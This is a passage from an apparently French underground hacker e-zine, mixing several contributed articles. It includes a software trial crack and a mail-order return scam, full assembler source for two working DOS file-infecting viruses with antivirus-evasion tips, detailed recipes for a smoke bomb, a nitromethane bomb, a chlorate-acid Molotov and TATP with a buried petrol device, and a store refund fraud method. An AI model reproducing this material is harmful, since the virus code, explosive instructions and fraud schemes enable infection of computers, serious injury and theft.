un de ces fichiers, donc les fichiers du dossier temp resteront donc toujours les meme. Il seront à chaque recopiez dans le dossier du prog donc le programme resteront toujours au nombre de lancement ou de jours à il en était.Compris? :) Dans ensuite faites un raccourci de crack.bat sur le bureau comme c'est plus pratique. J'ai dit pas que ca marche tout le temps, par contre j'ai essaillé sur ciel gestion commerciale ca fonctionne à merveille! Infos: si vous voulez des programmes ciel gratos qui coute cher , commandez-les à Jpg , avec la possibilté de payer dans une semaine, commandez en version disquettes si vous n'avez pas de graveur, quand le paquet arrive , ouvrez le consciensement sans rien bouger d'autres ouvrez la boite du prog prenez juste la petite pochette avec les disquette à l'interrieur , ouvrez la pochette tout doucement, sans l'abimer, les disquette ne sont pas en mode protegé, protegé les, pour pas que qu'il ai une modifcations dans l'onglet proprités des fichiers au niveau des dates et de accédé le ..... Copiez-les sur le disk dur dans des dossier genre : disk1 disk2 .... Deprotegez les disquettes et mettez les dans la pochettes. Chez ciel il sont cons , on peut lancer 50 fois le programme quand on a pas encore payé le prog , donc quand on a pas encore recu le n° de licence. Crackez le , comme je vous ai dit (sans faire attention au sous-dossiers du prog, remettez les disquettes à l'intérieur. Bien ou elle étaient! Renvoyez le tout à Jpg, bien remballé avec du beau skotch :) Les logiciel ciel sont souvent multi-utilisateur, faites vous un compte et c'est bon! Normalment Jpg va vous rappeller vous demandant pourquoi vous l'avez renvoyer,vous dites que ca vous convient pas , mais dites surtout pas que vous avez ouvert la boite; et c'est bon! Je vous assure que ca marche bien! PS : Je l'ai fait avec Ciel Gestion Commerciale! :) Puis dans le prog , qui vous bombarde de question, mettez que des connerie pour votre nom, votre adresse....... ================================================================================================ Les virii (ou virus au singulier !) by FuNzZy ================================================================================================ Me voila pour quelques tutoriaux sur les virii... Yeahh ! :) Je sais que c'est une science un peu compliquée au début mais je vais essayer de bien tout expliquer. Par contre faut pas compter sur moi pour faire un cours en assembleur, si tu veux apprendre l'asm et que tu y connais RIEN tu lis des livres et reviens après car c'est pas possible sans quelques bonnes et GROSSES BASES ! :) Nous avons besoin: - d'un PC !! :) - d'un mec assez intelligent et qui connait un peu l'ASM - TASM ET TLINK - EDIT :) - INTLIST ou HELPPC pour savoir les interruptions Intlist ou HelpPc sont très utiles car ils énumèrent les interruptions du DOS. Bon voila fini INTRO, je commence avec comment infecter un fichier .COM . C'est le plus simple en fait car les .EXE c'est un peu le bordel ! :) Les fichiers .COM commence comme vous devez le savoir à 100h en mémoire (ORG 100h) et à cette adresse il y a un JUMP pour aller aux début des données. (voir livres sur l'ASM !) Un fichier .COM se termine en appelant l'interruption 20h (INT 20h) si ceci n'est pas fait à la fin le programme va planter le PC.(CooL!) Donc voila ce que nous devons faire avec notre superbe et gentil virus: - Il doit ouvrir le fichier .COM - Se recopier à la fin (Après le INT 20h) Bon jusque la pas de problème à part pour trouver les fichiers .COM a infecter. Si vous etes légerement intello vous allez me dire: "Ben ca peut pas marcher car le programme va s'executer et se terminer normalement sans executer le virus à la fin !" Ben oui t'as raison gars et la il y a plusieurs problemes qui nous tombent dessus ! ;) - Le virus doit modifier le JMP de début du .COM qu'il infecte. Un JMP est sur 3 bytes, les 2 derniers servent à indiquer la taille du saut. (Combien il doit sauter de bytes !) Donc il nous suffit remplacer ce JMP par la taille de l'executable a infecter pour avoir le début du code du virus ! Ah ouais pas bête hein !! :) Bon jusque la je crois que j'ai été clair, enfin j'espère ! Bon toi qui lit je te demande maintenant de réfléchir (c'est dur mais essaye !) quel problème se pose à nous. INDICE: Nous avons des labels qui ont une adresse mémoire défini a la compilation. Lorsque le virus est à la fin d'un fichier ben.... ca change les adresses et on est dans la merde car par exemple le label Virus est à 106h, le saut JMP virus vaut donc JMP 006h ou JMP 106h et comme il est a la fin du fichier infecté il vaut plus 106h et donc ca plante ! Alors voila y'a une astuce pour résoudre ce problème et la voici: VIRUS: Db 0e9h,0,0 ;JUMP au prochain label ! Debut_virus: CALL CHERCHE_FILE ;appel Cherche_file, nous en avons besoin ;pour avoir le décalage d'adresse avec les ;labels et variables. Cherche_File: POP BP ;Récupère la VRAI adresse de cherche_File SUB BP,Offset Cherche_File ;Soustrait avec l'adresse ;"D'avant" ! Bon voila en gros BP contient maintenant après le SUB soit 0 si le fichier est celui d'origine, ou le décalage s'il est a la fin d'un fichier .COM . Pour utiliser tout ca il suffit d'addition BP ! Ex: MOV DX,[Bp+variable] A part ben lorsque le virus a fini sont execution il faut qu'il execute le fichier .COM reel de départ. C'est pour cela que l'ASM rapide et compact est utilisé pour les VIRII. Pour rendre la main il nous suffit jumper à 100h en mémoire de la manière suivante: MOV DI,100h JMP DI Sinon que dire... ben pour le moment on va faire un virus qui infecte les COM et puis ben c'est tout. On rajoutera des fonctions par la suite dans un autre deathlyby ! :) J'allais oublier faut la DTA aussi c'est pratique comme truc pour avoir le nom du fichier trouvé. Voila un tableau qui récapitule ces fonctions: Offset Size Function 0h 21 Bytes Reservé 15h 1 Byte Attributs du fichier 16h 2 Bytes(WORD) Time du fichier 18h 2 Bytes(WORD) Date du fichier 1Ah 4 Bytes(DWORD) Taille du fichier 1Eh 13 Bytes Nom du fichier Vous verrez comment l'utiliser par la suite. BON ALLEE GO GO GO.... LE CODE SOURCE !!!! Cut here --------- Copier ici pour les FRANCAIS ;)) ---------------------------- Code SEGMENT ASSUME CS:Code,DS:Code ;CS et DS pointe sur Code ORG 100h ;COM FILE VIRUS: db 0e9h,0,0 ;Jump au prochain label : debut_virus Debut_virus: CALL Original_Byte ;appel Int_DTA, nous en avons besoin ;pour avoir le décalage d'adresse avec les ;labels et variables. Original_Byte: POP BP ;Récupère l'adresse SUB BP,Offset Original_byte ;Calcul le décalage mov cx,3 ;Va déplacer 3 OCTETS lea si,[bp+OFFSET original_bytes] ;MET DANS SI LES 3 BYTES ORIGINAUX mov di,100h ;MET A 100h(EN MEMOIRE LES COMS COMMENCENT ;A 100h...) rep movsb ;REMET LES OCTETS ORIGINAUX Init_DTA: lea dx,[bp+OFFSET dta] ;MET DANS DX L'ADRESSE DE dta mov ah,1ah ;FONCTION 1Ah: Initialisation int 21h ;LANCE L'INTERRUPTION trouve: mov ah,4eh ;1ere recherche pour une victime ! lea dx,[bp+com] ;Cherche *.COM mov cx,7 ;N'importe QUELLE ATTRIBUTS... cherche: int 21h ;Cherche, allé cherche !! :) jc Close_DTA ;Si Carry, pas de fichier trouvé saute a close_DTA Infect: mov ax,3d02h ;fonction 3d02h : Open pour Read/Write lea dx,[bp+OFFSET dta+1eh] ;DTA+1eh CONTIENT LE NOM DU FICHIER int 21h ;DO IT ! :) xchg bx,ax ;met le handle dans BX pour la suite. ;Equivalent de MOV Bx,Ax mais en - gros ! :) VIVA OPTIMIZATION ! mov ah,3fh ;Lit dans le fichier lea dx,[bp+original_bytes] ;Met le résultat de la lecture dans original_bytes mov cx,3 ;Lit 3 bytes int 21h ;appel l'interruption ;Ceci est un non overwriting Virus. Nous allons donc vérifier si le fichier ;est infecté en comparant la taille ! mov ax,word ptr cs:[bp+dta+1ah] ;Ax = Taille du fichier (Voir Tableau DTA) mov cx,word ptr cs:[bp+original_bytes+1] ;CX = Les 2 derniers Bytes du Jump, ;donc la taille du fichier s'il est ;infecté add cx,end_virus-debut_virus+3 ;Y ajoute la taille de notre Virus cmp ax,cx ;COMPARE ! je ferme ;Si egale alors fichier deja infecté! Sub ax,3 ;Car nous les avons deja lu juste avant! mov word ptr cs:[bp+newjump+1],ax ;MET DANS LES 2 DERNIERS BYTES ;DE NEWJUMP LA TAILLE DU FICHIER ;CALCULE DONC LA TAILLE DU JUMP mov ax,4200h xor cx,cx cwd ;= XOR DX,DX en - gros int 21h ;Va au debut du fichier ! mov ah,40h push ax lea dx,[Bp+newjump] ;Nouveau saut pour le com infecté mov cx,3 ;3 bytes a écrire int 21h mov ax,4202h xor cx,cx cwd int 21h ;Va à la fin du fichier pop ax ;ah=40h mov cx,end_virus - debut_virus ;nombre de bytes a écrire = taille du virus lea dx,[bp+debut_virus] ;pointe sur le début du virus en mémoire int 21h ;ECRIT ferme: mov ah,3eh ;FERME LE FICHIER int 21h mov ah,4fh ;CHERCHE PROCHAIN FICHIER jmp cherche Close_DTA: mov dx,80h ;Aurevoir DTA, on veut plus de toi :) mov ah,1ah int 21h Return_Original_Prog: mov di,100h jmp di ;Saute a 100h et donc execute le fichier normalement ;Variables Signature db 'FuNzZy's virus. Tuto 1 deathlyby 5' Com db '*.COM',0 ;COM INFECTOR original_bytes db 0cdh,20h,0 newjump db 0e9h,0,0 dta db 42 dup (?) End_virus label near Code ends end VIRUS Cut here --------- Copier ici pour les FRANCAIS ;)) ---------------------------- Ben voila, le virus de base que tout le monde devrait connaitre, ou savoir faire ! (après de l'entrainement et de l'effort vous verrez que vous pourrez taper des codes à peu près dans le genre !) Pour Compiler: TASM fichier.asm tlink /t fichier Notre virus fait: 193 octets !!! VIVE L'ASSEMBLEUR !!!!!!! :)))) (Vous verrez dès qu'on rajoute quelques fonctions ca monte vite !) Si vous voulez tester le virus sans infecter votre bècane (ca serait bête !) il vous suffit de redirectionner les accès aux disques durs vers a: commme ceci: SUBST C: A:\ ou SUBST X: A:\ Cette méthode marche pour tous les virus, enfin je vous conseille de tout de même faire attention avec les résidents en mémoire ! Autre conseil pour tester, démarrer avec une disquette de boot avec subst et le systeme, et ensuite tester le virus ! Attention a ne pas redémarrer par erreur avec cette disquette par la suite ! :) Revenons au virus au-dessus. Jusque la c'est pas trop compliqué, ce virus est vraiment minable, il n'est pas crypté, n'infecte pas les .EXE, ni les .SYS..., il ne fait rien, n'infecte pas les fichiers Read Only, pas résident en mémoire, ne change pas de repertoire et cherche pas a comprendre si le fichier .COM est réelement un COM (en effet des EXE sont mis en .COM ! comme le COMMAND.COM par exemple, regarde l'entete du fichier: MZ = EXE :) ) Antiviral Toolkit Pro reconnait plus ou moins le virus: Warning VCL-Based. Mais il n'est pas capable de le désinfecter ni de dire réelement si c'est un virus. Nous verrons une prochaine fois comment passer a traver de ces saloperies d'antivirus qui veulent absolument tuer nos gentils et adorables virii ! :))) Enfin pour le moment c'est tout de meme un bon début ! Si vous avez quelque chose a me demander, a me soumettre, pas de probléme je suis a votre disposition: FuNzZy@Hotmail.com Prochain cours sur les virii nous verrons comment déjouer les détections, comment mettre un message, comment faire faire une action au virus un certain jour ! Bref de belles choses koi ! Rendez vous pour Deathlyby 6 :))) ================================================================================================ Les Virii! By Eldre8 ================================================================================================ Donc dans cette article, nous allons voir la creation d'un virii assez simple, mais sachez qu'il est bon de connaitre un peu l'assembleur. Le but d'un tel virus est de pouvoir lui implanter apres, plein de nouvelles possibilites comme l'appending, le cryptage, le polymorph, la metamorphoz... Neanmoins, pour ne pas faire comme tout le monde, ce virus overwrite pourra s'attaquer au CoM ET au ExE, ce qui le fera (a coups sur) faire planter radicalement la machine. (de nos jours les CoM ne sont utilises que par les bidouilleurs sous dos => peu de monde...) Donc, pour commencer il vous faut le compilateur TASM (et pas A86 ou CHASM). Pour clarifier les choses, nous allons nous interresser a la structure des CoM et ExE. -CoM : Ils commencent tous a l'adresse CS:IP -> xxxx:0100 -ExE : Pour trouver CS:IP il faut aller a l'adresse xxxx:0014, on y trouve alors un WORD et un WORD; Le premier word est l'adresse, le deuxieme est l'offset, donc de la forme 1400xxxx dans la memoireù Nous ne nous occupons que de l'adresse. Il faudra ensuite repositionner l'endroi ou ecrire dans la cible avec cette info. -------------------------Couper la--------------------------- ;A compiler avec Tasm ;Par: TASM nom_du_fichier ;puis TLINK /T nom_du_fichier ;Youlha distributed under GNU license by Eldre8 youlha segment assume cs:youlha; ds:nothing; es:nothing; ss:nothing org 100h start: push cs ;met CS=DS pop ds ;Oblige si l'on se trouve par la suite dans un ExE mov ah,4eh ;cherche mov dx,offset com ;un .com int 21h ;execute la recherche jc search_exe ;si pas de fichier com va chercher un exe jmp com_over ;un fichier .com existe, on va l'overwrite search_exe: mov ah,4eh ;cherche mov dx,offset exe ;un .exe int 21h ;execute la recherche jc quit ;si pas de fichier quitte exe_over: ;si il y a fichier .exe mov ax,3d02h ;prend le nom dans la dta mov dx,9eh ;a l'adresse 9e de la dta int 21h xchg ax,bx ;met le nom recupere de AX dans BX mov ax,4200h ;place le pointeur d'ecriture a xxxx:0014 cwd ;efface le registre DX xor cx,cx ;efface le registre CX int 21h mov ah,3fh ;lit dans le fichier exe mov cl,2 ;2 bytes (yyyy) mov dx,offset buffer ;les place dans buffer int 21h mov ax,4200h ;place le pointeur d'ecriture a 0 cwd xor cx,cx int 21h mov ah,40h ;ecrit mov dx,offset start ;a partir de start mov cx,(offset vend - offset start) ;tant de bytes int 21h mov ah,3eh ;ferme le fichier int 21h jmp quit ;quitte com_over: ;si il y a fichier .com mov ax,3d02h ;prend le nom dans la dta mov dx,9Eh ;a l'adresse 9e de la dta int 21h xchg ax,bx ;met le nom recupere de AX dans BX mov ax,4200h ;place le pointeur d'ecriture au debut du fichier cwd ;efface le registre DX xor cx,cx ;efface le registre CX int 21h mov ah,40h ;ecrit mov dx,offset start ;a partir de start mov cx,(offset vend - offset start) ;tant de bytes int 21h mov ah,3eh ;ferme le fichier int 21h quit: mov ax,4c00h int 21h ;quitte com db '*.com',0 ;mask de com exe db '*.exe',0 ;mask de exe virus db 'Youlha v1.0',0 ;Conforme au 40hex auteur db 'by îldçeì',0 ;Conforme au 40hex comment db 'only for purpose',0 vend: ;sur ma machine et avec tasm2.01, si il n'y en vend: ;a pas 2 ca plante! connais pas la cause! buffer db ? youlha ends end start -------------------------Couper la--------------------------- Ce virus vous est peut etre dur a comprendre, mais relisez le 2 ou 3 fois et vous comprendrez. Je suis conscient du fait que ce virus n'est pas du tout optimise, qu'il ne peut s'attaquer ka des EXE de moins de 65535-taille_du_virus octets mais la n'est pas son but, vous pourrez faire vos virus optimise, de plus il n'integre pas de controle de fichier deja infecte, on peut le faire avec la fonction AH=3F de l'INT21 qui permet de lire puis en comparant les bytes. Ce virus n'est pour l'instant pas encore reconnu, donc faite attention a votre systeme (ExE et CoM) et a celui des hot(r)es si vous utiliser McAffee. P'tit note: Il n'existe pas de virus sous LinuX... P"tit note de plus: Une info pour faire passer les virii inconnito de la plupart des antivirus(sauf tbav), vous pouvez mettre au debut: FCOM ST(0) ;ou 0 peut aller jusqu'a 7 (bits) WAIT ;une pause Si l'ASM vous interesse et que vous pataugez, lisez un peu, il y a des tas de livres pas chers pour apprendre(pas de pubs!). Amusez vous bien mais attention aux cops, il detestent les virus... Eldre8 ================================================================================================ Explosifs et fumigènes ! By Titux ================================================================================================ Si un jour t'as besoin de te tirer rapide(si les keufs arrivent alors que tu pose des bombes), fais un bon gros fumigène, ça peut t'aider pour ça, t'a besoin de besoin de : une grande marmite dia. 30cm une grande boite en metal cylindrique dia. 18cm(boite de café) 5 kilos de salpetre 5 kilos de sucre eau 1. verse le sucre et le salpetre dans la grande boite a cafe et melange. si ça rentre pas, va jusqu'au n. 6 et rajoute-en au fur et a mesure que ça fond. 2. verse de l'eau dans la grande casserole et fait bouillir. 3. prends 1/2 tasse d'eau bouillante et verse sur le sucre/salpetre 4. met le pot à cafe dans la grande casserole, sans faire entrer plus d'eau dans le sucre/salpetre. c'est un bain-marie 5. brasse le melange, tout en gardant l'eau de la casserole le plus chaud possible. 6. melange continuellement jusqu'a ce que le sucre commence a fondre. 7. quand le melange est devenu un melange homogene, une pâte epaisse, retire du feu. 8. plante une meche dans le melange et laisse le refroidir. prends par exemple des "cierges magiques", le truc qui fait des étincelles et que tu fous sur les gateaux d'anniversaires. 9. allume la meche et tire toi Tu peut te marrer a faire une bombe liquide : de la nitro pure(je déconne...) pour ça, t'a besoin de: Nitromethane (pour les avions teleguides) Ammoniaque clair (pour laver les vitres) Petit detonateur electrique fait avec du peroxiacetone cannette de bière(ou de ce que tu veux) 1. trempe le detonateur dans la cire liquide pour qu'il soit impermeable 2. coupe et enleve le dessus de la cannette avec un ouvre boite 3. melange le nitromethane avec l'ammoniaque( 9 volumes de nitromethane pour un volume d'amoniaque) 4. construits en suivant ce schema : oÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ º ³ º ³ ³ º ³ ³°°°°°°°º°°°°°°°³ ³°°°°°°°º°°°°°°°³ ³°°°°°²²²°°°°°°°³ Ä cannette de bière ³°°°°°²²²°°°°°°°³ ³°°°°°²²²°°°°°°°³ Í fil electrique ³°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°³ ² detonateur ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ° nitromethane/ammoniaque 5. fait detonner le detonnateur Le coktail molotof chimique pour faire ce coktail molotof, tu doit employer de l'acide sulfurique. Bon, pour commencer, tu vide une bouteille d'acide sur tes mains, une autre sur to dos. Si ça chatouille, c'est pas bon, si ça gratouille, c'est bon. Pour utiliser la 3e bouteille, je te dis, protège toi, met des capot.. heu, des gants prévus pour. Chlorate de potasium (Labo/Magasin de chimie) Une bouteille de bière, env. 25 cl 2 cuilleres a café de sucre 2 cuilleres a café d'acide sulfurique concentre (Batterie de char) Une casserole en émail(pas en E-mail, haha... heu, faut rigoler) 17 cl d'essence des serviette de papier de la colle contact 2 cuilleres a café de chlorate de potasium 1) regarde si l'acide ne bouffe pas le bouchon de la bouteille, sinon trouves-en un autre. Le meilleur serait en metal 2) Verse les 17 cl d'essence dans la bouteille de bière(en verre, pas en plastique) 3) Verse attentivement les 2 cuilleres d'acide sulfurique concentre dans la bouteille de bière. Essuie la bouteille pour etre sur qu'elle ne soit pas mouillé par l'acide, et visse le bouchon solidement. Relave la bouteille avec beaucoups d'eau. Laisse secher. 4) Met environ deux cuilleres a café de chlorate de potasium et environ deux cuilleres a café de sucre dans un verre ou une tasse en plastique. Ajoute environ une demi tasse d'eau bouillante, ou assez pour dissoudre tout le potasium chlorate et le sucre. 5) Place un drap ou une serviette de papier dans la casserole et plie la serviette de papier a moitié, verse la solution de chlorate de potasium et de sucre sur cette serviette jusqua ce quelle soit entierement mouillé. Laisser secher. 6) Quand tout sera sec, met de la colle sur les 2 cotés de la bouteille de verre contenant l'essence et l'acide sulfurique. Emballe la serviette de papier autour de la bouteille, soit certain qu'elle colle des 2 cotes, pour pas quelle amorce le choc. Emagasine la bouteille dans un endroit ou elle restera droite. 7) Quand tout est fini, les solutions dans la bouteille devraient paraitre comme deux liquide distinc, un brun-rouge qui sera dans le font et l'autre claire qui sera sur le dessu. Les deux solution ne ce melangeront pas. Emploie la bouteille chimique comme un simple molotof. Balance la sur qqch de dur, et quand elle casse, ça fait boum ! 8) N'oublie pas que si l'acide sulfurique rentre en contact avec la solution de sucre et de chlorate de potasium, tout te pête a la geule ! 9) Pour tester si elle va exploser, prends un bout du papier imbibé de la solution de sucre et de chlorate de potasium et verser une goute d'acide sur ce petit bout de papier, si ca fait une flame blanche c'est que ça marche. Sinon, rajoute un peu de chlorate de potasium dans la solution sucre/chlorate/eau avant de tremper le papier dedans. _*BOOM*_, tout simplement !! Le péroxiacetone, ou péroxide de tricycloacetone, est une poudre blanche qui peut être fabriquée à la maison facilement. C'est un explosif de puissance moyenne. Il est fabriqué à partir d'acetone et de péroxide d'hydrogène et d'acide chloridrique comme catalyseur. Quand est chauffé suffisamment, le solide blanc se décompose en méthane qui explose instantanément. A l'air libre et en petite quantité, il explose en faisant une jolie boule de feu orangée. Mais compressé un milipoil ou dans un contenant semi-fermé, il pête en produisant un puissant _*BOOM*_. tu peut l'utiliser comme démo, comme détonnateur ou comme moyen de destruction. (N'oublie pas de toujours tester dans les cabines Fuck Telecom ou avec un vieu CD de merd-dose 95.) La formule(symboles chimiques de la classificatin périodique des éléments) Fallait bosser en physique 6 CH COCH + 3 H O + HCl --> 2 (CH ) C O + 3 H + HCl 3 3 2 2 3 6 3 6 2 CH COCH --> acetone 3 3 H O --> peroxide d'hydrogène 2 2 HCl --> acide chloridrique (CH ) C O --> péroxide de tricycloacetone 3 6 3 6 pour compiler ta bombe il te faut: acetone (pharmacie, Réno-Dépot...) peroxide d'hydrogène (pharmacie, Réno-Dépot...) acide chloridrique (Canadian Tire, laboratoires...) truc gradué en millilitres éprouvette large ou contenant semblable compte-goutte filtre en papier (à café) entonnoir Verse en quantités égales acétone et péroxide dans l'éprouvette (pour que le mélange remplisse environ 4/5 de l'éprouvette) Ajouter quelques gouttes d'acide avec un compte-goutte et agiter sans tout renverser. Maintenant, il faut attendre quelques heures. Il faut attendre que la réaction de précipitation soit terminée. (l'acide agit comme cataliseur) Ensuite il faut filtrer le mélange pour récolter le produit. La réaction dans le liquide va alors recommencer , et vous pourrez alors filtrer encore un peu plus de produit. Ensuite laisse sécher la poudre. formule d'explosion: (CH ) C O --> 6 CH + 3 CO --> combustion du méthane 3 6 3 6 3 2 CH --> méthane 3 (NdDRooPY c’est pas CH4 par hasard ?) CO --> dioxyde de carbone 2 méthode d'utilisation: Tu peux en mettre un petit peu sur quelque chose et l'allumer avec une alumette, pour avoir une belle boule de feu. Attention: commence des très petites quantités (volume d'un grain de riz). tu peux en mettre un petit peu sur une feuille de papier et mettre une flame sous le papier vis-à-vis la poudre pour faire le même effet qu'un pétard à mêche. tu peux en mettre un petit peu dans un papier d'aluminium, replier le papier et appliquer une pression sur le petit paquet. Ensuite tu peut le jeter dans le feu tu peux remplir une petite boite de film avec de la poudre très compactée et y insérer un petit baton noir (cierge magique) au centre et ensuite mettre le bouchon (avec un trou au milieu). Fais comme une mèche après, tu emploie comme ça: Remplis une boite de jus de tomate avec de l'essence. Colle le pétard sous la cannette faise un trou dans le sol du diamètre de la cannette et d'une profondeur égale à la hauteur de la cannette. Place la cannette dans le trou. Tu peux recouvrir le tout de gazon pour une plus grande surprise. Trouve un moyen d'allumer la mêche. Allume là. Réfugie-toi derrière un mur et BOUCHE TOI LES OREILLES en trouvant le moyen de regarder l'explosion. Regarde la boule de feu de 20 pieds de haut. Allumer la mêche. FAIT GAFFE EN REALISANT CETTE EXPERIENCE, C'EST ILLEGAL racontez-moi, et mailez-moi pour créer des discussions a titux@chez.com Complément de DRooPY Ah ça fait plaisir de voir qu’y en a qui s’interressent à la chimie. Petite suggestion pour ceux qui sont assez bons en chimie et qui ont comme Titux plusieurs formules d’explosifs à leur disposition et qui veulent faire un classement des explosions selon l’énergie qu’elles dégagent : Il suffit de calculer les chaleurs de réaction de chacune des réactions: Il faut un livre de chimie qui va vous donner les valeurs des énergies de liaison ( par exemple dans la molécule H2O il faut pour rompre cette molécule fournir 2 fois l’énergie H-O ) Il faut écrire et équilibrer l’équation-bilan de la réaction du mélange avec l’O2. Puis on fait la somme des liaisons rompues moins la somme des liaisons formées, et on obtient la chaleur de combustion du corps, et elle est dans les cas des explosifs négative.Plus elle est négative, plus la réaction libère de l’énergie. EXEMPLE: CH4 + (2) O2 ---> CO2 + (2) H2O Chaleur de réaction = (4*Ec-h + 2*E0=0)-(2*Ec=0 + 4*Eh-0) Il ne vous reste plus qu’a remplacer ces lettres par les valeurs que vous avez trouvées et vous obtenez la chalur de combustion du méthane en Joules ( j ) Oui je sais c’est un peu chiant mais c’est parfois utile si vous voulez faire un remake de l’expert ! ================================================================================================ Introduction au cryptage By Faust ================================================================================================ Tout d'abord, je voudrais remercier toute l'équipe de DeathlyBy de m'accepter au sein (ouhlala, ça commence bien !!!) de leur équipe ! Je suis un Nioubaille de base en matière de hacking, cracking, programation, je sais ô combien c'est frustrant de lire un article et de ne rien comprendre passke l'auteur n'a pas bien tout détaillé, mais ne vous inkiétez pas , plus vous lirez de zines et mieux vous comprendrez (a force de lire l'exploit Netbios , j'ai fini par comprendre...) et si j'y arrive, vous y arriverrez aussi . Ce n'est qu'après avoir beaucoup lu d'e-zines (MJ13, HUV, Hackview, FrHack, core-dum, Noroute, Noway, Nofutur et bien d'autres !) traitants du hack , crack , phreack etc ... que j'ai décidé d'écrire un (ou des) articles, afin de contribuer à ma manière à la progression de la scène Française en matière d'underground . Je commence donc par un tout petit article sur le cryptage des mails : Le cryptage est l'action d'écrire un message avec des caractères différents de ceux connus et utilisés, ke seul votre complice pourra déchiffrer. En gros , si j'écris : ¢¦æ£$µ%@# , vous y comprenez rien; il vous faut donc le texte attribuant ces symboles aux caractères usuels. (c'est le principe de la pierre de rossette: pour déchiffrer les hiérogliphes, Champolion est partit d'un morceau de pierre sur lekel était gravé des phrases en latin et leur signification en hiéroglifs; BON, OK, J'ARRETE DE VOUS PRENDRE LA TETE AVEC L'HISTOIRE !) Alors voilà, la meilleure façon pour ke votre patron n'espionne pas vos mails, c'est encore de coder les phrases: Pour cela , il existe de nombreuses technikes: (qui n'ont rien à voir avec l'informatike , je vous l'accorde :) ) - Soit vous décallez les lettres de l'alphabet (par exemple , le A=Z, B=Y, C=X, etc...) - Soit vous vous servez de symboles (mais là, ça devient vite laborieux!) - Soit vous utilisez un "coder" ou "encrypter" ke vous trouverez sur le Net ( - Soit vous utilisez la technike ke j'appelle "Georges Sand" (voir fin de l'article) - Soit vous faites vou-même votre prog de cryptage Mais le blème , c'est comment faire pour transmettre le code de décryptage à votre correspondant? Bah là, démerdez-vous: - Par téléphone , c'est pas top top - Par mail, c'est complètement idiot (bah oui, puisske votre Boss lit votre courrier!) - Par IRC, mais je crois ke toutes les conversations sont enregistrées alors c'est pas la peine! - En main propre: Vous fournissez un papier sur lekel est écrit le code de décryptage. (c'est le mieux, je pense, mais là aussi , attention à ne pas laisser trainer le papier!!!) Sinon , pensez à la technike "Georges Sand" ki est , certes farfelue , mais ki marche bien: Ce texte est extrait d'une lettre ke Georges Sand (c'est un meuf!) à envoyé à Alfred de Musset : Je suis très émue de vous dire que j'ai bien compris l'autre soir que vous aviez toujours une envie folle de me faire danser. Je garde le souvenir de votre baiser et je voudrais bien que ce soit par là une preuve que je puisse être aimée par vous. Je suis prête à vous montrer mon affection toute désintéressée et sans calcul, et si vous voulez me voir aussi vous dévoiler sans artifice mon âme toute nue, venez me faire une visite. Nous causerons en amis, franchement. Je vous prouverrais que je suis la femme sincère, capable de vous offrir l'affection la plus profonde comme la plus étroite en amitié, en un mot la meilleure preuve dont vous puissiez rêver, puisque votre âme est libre. Pensez que la solitude où j'habite est bien longue, bien dure et souvent difficile. Ainsi, en y songeant, j'ai l'âme grosse. Accourez donc vite et venez me la faire oublier par l'amour où je veux me mettre. A première vue, ça ne semble pas codé, mais si vous lisez une phrase sur deux, le résultat est tout à fait différent!!! Alors, pour une fois dans votre vie, si votre prof de Français vous parle de Georges Sand, ressortez lui ce texte!!! Voilà, je vais essayer pour le prochain n° de vous faire un tit prog pour crypter et décrypter vos messages; en attendant, bonne continuation. Maintenant , vous pouvez traiter votre patron d'enculer et draguer la petite stagiaire sans vous faire griller!!! Allez sur ce site , y'a plein des messages cryptés : http://messel.emse.fr/~gsoler/crypto1.html *** You were kicked by FAUST *** *** Now you are disconnected *** Ecrit et rapporté par FAUST : - faust19@caramail.com - irc.funradio.fr port 6667 ou 4441 sur #ioda ou #Mat "Le temps n'a pas d'importance, seule la vie est importante" .Le 5ème élément. ================================================================================================ Commet hacker la FNAC ou un autre grand distributeur de logiciels By Faust ================================================================================================ Bon, je sais, cette technique est plus que connue mais bon, certains ne la connaissent peut-être pas encore (ça existe?) Vous avez surement déjà voulu vous payer un jeu (diablo2) ou un logiciel(diablo...euh non FAUST, c pas un logiciel ça!!!) mais au moment de passer à la caisse, a plus pognon! Je comprends votre déception, ça m'est arrivé pas mal de fois :) Alors voici le remède: (mais comme tout remède, il faut respecter les conditions d'emploi et ne pas en abuser) - Vous allez à la FNAC ou chez Carrefour ou un autre magasin chez ki existe le slogan :"satifait ou remboursé" (n'allez pas chez Félix Potin!) Vous achetez votre jeu ou logiciel , pis vous rentrez pépère coolos à la maison.(ne paumez pas le ticket de caisse!!!!) Sautez sur votre graveur, ou s'il s'agit de jeux tels ke tomraider 3 , pas la peine de ce précipiter, faut modifier le .exe (on verra plus tard, si vous êtes sages!)Evitez le Pack officePro ou les logiciels du genre adobe illustrator (qui coûte dans les 7 000 Francs!!!) - Gravez votre nouvelle acquisition (wow, je savais pas ke ces mots-là existaient!) et faites-en une copie pour vos potes (on a toujours besoin de ces potes un jour ou l'autre!) Voilà, maitenant, vérifiez que le jeu ke vous avez graver marche bien.(si c'est Starcraft ou Commandos, ou un autre jeu qui vous dis gentiment :"Veuillez insérer le CD patati patata" allez chercher le crack sur internet, y'en a un sacré packet!) - Ensuite foncez armé de votre ticket de caisse ainsi ke de l'original de votre CD (soyez pas con, leurs refillez pas votre copie!!!) et allez au service client ou à l'aceuil (choisissez votre victime: évitez les gros balèzes de 150Kg de muscles ou les techniciens) allez vers la gentille femme bombe sexuelle, avec des cheveux blonds, ki reflètent le lumière du néon,(ça rime) les yeux verts pétillants, pleins de vie, en gros , la fille ke vous ne verrez ke dans vos rêves bah ouais si la femme parfaite travaillait à la FNAC, ça se saurait!!!) et dites ke vous avez acheter le CD et k'il est incompatible avec votre matos blablabla, bref, démerdez-vous pour k'ils vous reprennent votre CD et sutout k'ils vous rendent votre précieux pognon! Voilà, surtout n'oubliez pas de ne pas trop en faire et ne détériorez pas le boitier du CD ou la pochette sinon il ne voudront pas vous les reprendre. (faut pas confondre la FNAC avec Gilbert Joseph!) Bon, maintenant essayez de ne pas leur faire le coup toutes les semaines , et changez de magasin, c'est conseillé. *** You were kicked by FAUST *** *** Now you are disconnected *** faust19@caramail.com irc.funradio.fr #ioda ou #Mat (pourquoi sur le serveur de fun? passke les autres sont sur ircnet et ke nous devons être joignables par tous et non pas ke les utilisateurs de IRCnet!) ********************************************************************************************************************** ** Remerciements : eViL-dEaD, 'Kenji', Demon pour leurs protections et leurs heures de patience à m'expliker la vie ** ** IRCienne (je suis très chiant kand je comprends pas qqch!) ** ** Toute léquipe de 